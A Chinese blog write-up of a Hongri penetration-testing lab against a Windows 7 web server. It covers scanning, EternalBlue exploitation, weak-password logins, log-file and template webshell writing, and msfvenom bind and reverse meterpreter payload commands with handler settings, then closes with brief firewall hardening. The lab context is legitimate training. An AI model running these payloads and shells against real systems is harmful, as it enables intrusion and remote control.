红日靶场web服务器渗透

Le_ee 博客等级 码龄1年 Lv2

一:有关信息收集,漏洞发现,漏洞利用的攻击链

工具——nmap,arp-scan

使用范围差异

场景建议

nmap(全/深入)

可以跨网段扫描

扫描开放端口,跨网段

arp-scan(快/隐蔽)

探测同一网段内

快速发现局域网设备,绕防火墙

综:可以先用arp-scan快速定位目标,找存活主机,再用nmap深度扫描端口服务

先用arp-scan扫,更快,也可用 nmap -sn ….

再用Nmap 粗略扫一下该ip的端口开放情况:

基本确定,用Nmap 半开扫描,侵略扫描(此时kali开了root权限,-A直接包含-sT,-sV,-O)

-p-全端口扫描

-oN输出结果到hongri.txt

分析结果:版本:win7 profrssional sp1(存在大量公开漏洞),操作系统:微软windows,主机名STU1,域名:GOD.ORG

关键开放端口:445/tcp——SMB服务,可利用ms17-010,极高危漏洞

1026-1028/tcp——RPC动态端口,可以服务枚举攻击,中危漏洞

并且smb签名禁用了,说明允许中间人攻击

针对漏洞扫一下,检查有没有已知的高危漏洞

发现永恒之蓝存在,为高风险等级,优先攻击它以拿到system权限,然后提取哈希凭证,再进行内网横向移动

并且我们得知了域名,后续可以尝试渗透整个GOD域

二:ms17-010永恒之蓝漏洞

Root权限下进入msfconsole

搜索ms17-010(永恒之蓝)漏洞

使用第一个

msfvenom制作exe病毒来获取反弹shell

配置有效载荷的参数

运行:

成功获取对方win7 web 服务器的管理员shell

三:数据库webshell写入一句话木马

用kali进入win7的phpMyadmin

弱密码(root/root)登录后以root用户在对方web服务器的phpMyAdmin 中查看全局日志所在位置

执行该语句后发现路径为C:/phpStudy /MySQL/data/stu1.log

将全局日志打开:

更改全局日志的名字为hr.php,并将其放在网站的根目录下

随后写入一句话木马,由于该语句在运行时会报错,会被写入日志中,而日志又为php文件,所以我们通过AntSword来连接

蚁剑连接:

成功GET WEBSHELL

  • *后台弱口令爆破 + 模板注入GETSHELL()

对后台登录页面用bp进行弱口令爆破,发现管理员用户: admin & 123456,直接登录后台

通过点击查看,可以发现到

URL:http://192.168.145.173:80/yxcms/index.php?r=admin/index/index# 可以进行 写入php文件

新建一个shell.php文件

写入一句话木马:

通过查看yxcms的帮助手册得知,”模板”的文件路径为:

/protected/apps/default/view/default/shell.php

AntSword成功连接木马:

Get Web Shell!:

补充:MSF载荷及防火墙绕过

shell是 一个攻击机遥控受害机的遥控器

载荷(payload)是漏洞利用成功后在受害系统上运行的代码

1.正向shell与反向shell区别:

bind_tcp:是靶机主动连接攻击机的ip与端口,建立shell连接,易受防火墙的影响(LPORT)

reverse_tcp:则第一步是靶机主动发起连接(LHOST,LPORT)

什么场景下更适合使用反向 shel1? 什么场景下更适合使用正向 shel1?

・如果是初次渗透:能出内网​默认用反向,因为防火墙对出栈检测比较弱,内网隔离环境用正向

・如果有持久化的后门,优先用反向,因为攻击机ip的变化不不影响,并且能绕过出栈防火墙

这里我们的攻击机是 kali:192.168.145.128,目标机是win7:192.168.145.160

区分: 正向里LPORT是目标机win7端口,反向则是攻击机kali端口

2.有关msf

Msf venom

生成恶意程序

Exploit模块

利用漏洞 执行

Multi/Handler

接收连接

数据库模块

扫描结果

正向链接演示:

msfvenom -p windows /x64/meterpreter/bind_tcp L PORT=5555 -f exe -o b_op.exe

恶意程序/payload/目标操作系统/系统架构/载荷类型—高级交互shell/连接方式/地址/文件格式

所以:b_op.exe运行后,目标机(win7 )的5555端口开启监听

复制到win7去

Ps:root mv

msfconsole
use exploit/multi/handler :通用载荷处理器
set payload windows/x64/meterpreter/bind_tcp :正向shell
set RHOST 192.168.145.160
set LPORT 5555

run!win7打开恶意文件之后回显成功

反向连接演示

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.145.128 LPORT=9999 -f exe -o r_op.exe

其余类比bind _shell ,注意LPORT指的是kali的端口

配置参数:

运行后 成功得到目标主机的shell

补充一个PTY(伪终端模块)升级命令:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

升级之后ctrlc功能正常,可以快捷键补全,响应快

防火墙加固

win7

进入任务管理器把刚才的b_op.exe和r_op.exe结束进程,然后建立新的出站规则

仅通过配置出站规则,能否有效防御所有反向连接?

・不能,攻击者可能采用端口欺骗(比如用 80,443 端口等),协议伪装(比如看起来像 DNS 域名查询或浏览网页)

除了基于端口的防火墙规则,还有哪些更高级的加固手段可以防御此类攻击?

・使用白名单 —— 只允许特定程序访问,其他一律阻止

  • Title: 红日靶场web服务器渗透
  • Author: Le_ee 博客等级 码龄1年
  • Created at : 2025-10-31 07:03:50
  • Updated at : 2025-10-31 15:16:05
  • Link: https://leei.site/2025/10/31/红日靶场web服务器渗透/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
红日靶场web服务器渗透